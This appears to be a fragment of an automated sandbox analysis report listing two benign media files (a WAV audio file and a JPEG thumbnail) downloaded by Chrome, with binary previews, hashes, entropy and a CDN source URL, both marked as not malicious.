                                                                                                                                                                                                                  Preview:RIFFPM..WAVEfmt ........D... b.... .dataX...T'%.wwj.4.!...c..9...Z.....G]Q..L....G.....g.;...}./.-....#.S+...~.....9....h....0.............3.....aX..a.`.D7.b....G84......8@].?e.8.l 9~..9.C.9.X&9q.+:.j=9.ul:..S9w4.:HQj9...:H9.9.T.:V..9.1.:A.9>..;...9.U.;.].9.";.g.9...;p..9..:;.H.:..E;...:..O;.r.:J8Y;1u":..a;.Q+:..i;..2:.so;..8:Q.t;r.<:..x;.V?:..{;o.?:.};..>:. ~;..;:.v};(.6:.{;.a0:{.x;.(:Y.t;u..:..o;...:w.i;...:.pb;.&.:r^Z;.n.9.YQ;...9HjG;A..9R.<;...9..1;42.9..$;...9...;...9ZD.;...9.d.:.V.9sM.:jHx9.S.:.i]9..:..?9..~:s .9.=:[..8...9Ud.8..e9.:.8A..........B...Q)..a...s.R..?C..#..\..4P......l..j{...=.9.N...j...Y...YU.........Z+.d....\7.."...B..Q'...L.I.*.-.U.~J,...^...,.<+e...,..3k.?W+.-/p...)..#t..b'...w...%...x..."...y... .Z.y.....L.x......Ov..`....s..2....n..2...Mi..!..h.b.x....[..0...9S.<...`.J.`...C.?.....].5..c..)I).7{...... ..g...c.eX...5...?.y..J...Rm.y...v[,......l...K..5..w......7.E..z..8.;J..$.9s4~9.yN9...: ..9N:C:..9..:.J.9vy.:..9nR.:t&.9
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):19592
                                                                                                                                                                                                                  Entropy (8bit):7.957775027648893
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:279E3EE2E76E0B225FE57FB8A902C78B
                                                                                                                                                                                                                  SHA1:703FECBE95D90B252DFAE9BE3D3998F1581D729A
                                                                                                                                                                                                                  SHA-256:8294E6A57184BF4E7624237007E3F3CEA5B39B66D11D72D8D8AB69CAE277A87E
                                                                                                                                                                                                                  SHA-512:A59AEAA958BC523720D0E4F2C4CB763BAD89BB7B8FCACDC7CB64B200565255AC846B8D69FBAAE05005B77878720BF44C0139CD5A14F1463BA7692D2E3737F8A2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/55s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/55s/match/image.jpeg*~hmac=eae7231e0ab68bcfd0dcfb43b407b1ef658cb7c420ea2bf2ed25191c5d3bda14
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================..........."........................................D.........................!1A.."Qaq..2..#BR...b..$r...3CS.%&5cs...................................'......................!..1.A2Q.".B.3.............?....Q....[.aI.#.Td.rzWY..3.).u4...l...Ac..;P..l.l`Sd..Z.,........&.4.2A.....R.)..z.x..zbi.."l|.i}).......H..P!R.H...h.c.)..}..(.<b..oj[}..-....%.........4,9.\.&......K.4;.....b.p1...M..{Y.7dh.aO..._........>ia..@..Z4W.......4.m[Q.77..0..........C...g....|u..J./$0.jiR.Km...NH.V.#.H...P.xv.{..m...2..U..5I^..|...x5p+.."I.U......O.........Fd...\...V`e.TH.....O...y..........:...*.e..h....N..}...8..lo.V;$f..sO..;R....C.2..F.Z..l.....pi...M....W.jZ`.b.S..2Y<k....^H.=..>.....j}.qP....s.w.....U.....o..D.?SVl...7.!..Q.W..Z..f..x.H.....E...^.U.p.T.=..j>.3....,..&X.9$.>...2..2.8......>j.$~oz.6Wn
                                                                                                                                                                                                                  No static file info